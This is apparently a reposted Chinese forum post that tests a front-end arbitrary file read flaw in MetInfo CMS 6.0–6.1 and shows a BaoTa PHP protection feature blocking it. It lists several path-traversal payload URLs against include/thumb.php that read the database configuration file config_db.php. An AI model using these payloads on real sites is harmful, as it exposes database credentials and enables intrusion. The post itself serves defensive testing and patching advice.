米拓安全防护测试


本帖最后由 cuokon 于 2020-6-1 09:36 编辑

前台任意文件读取漏洞


影响版本 6.0-6.1

漏洞测试 Payload:
http://mymetinfo.com/include/thumb.php?dir=…..///http/…..///confi
g/config_db.php


图片1.png (54.75 KB, 下载次数: 14)

下载附件

2020-6-1 09:29 上传


成功读取到了配置文件,可以更新版本进行漏洞防御,
也可以选择开启堡塔PHP安全防护进行漏洞拦截


图片2.png (112.67 KB, 下载次数: 10)

下载附件

2020-6-1 09:29 上传

重新发送漏洞包,已经成功拦截该恶意请求


图片3.png (57.12 KB, 下载次数: 12)

下载附件

2020-6-1 09:29 上传

因为版本不同使用的Payload不同,可以尝试一下其他的payload,看看会被拦截
http://mymetinfo.com/include/thumb.php?dir=…/./http/…/./config/config_db.php

图片4.png (58.56 KB, 下载次数: 17)

下载附件

2020-6-1 09:29 上传


http://mymetinfo.com/include/thumb.php?dir=http/…..///…..///config/config_db.php

图片5.png (58.21 KB, 下载次数: 18)

下载附件

2020-6-1 09:30 上传


http://mymetinfo.com/include/thumb.php?dir=http….configconfig_db.php

1590975188(1).png (55.36 KB, 下载次数: 9)

下载附件

2020-6-1 09:33 上传


可以说还是很强大的,此漏洞的所有版本都可以进行相应的拦截,如果此cms存在误报欢迎来反馈。


转自   https://www.bt.cn/bbs/forum.php?mod=viewthread&tid=50289&extra=page%3D8%26filter%3Dtypeid%26typeid%3D10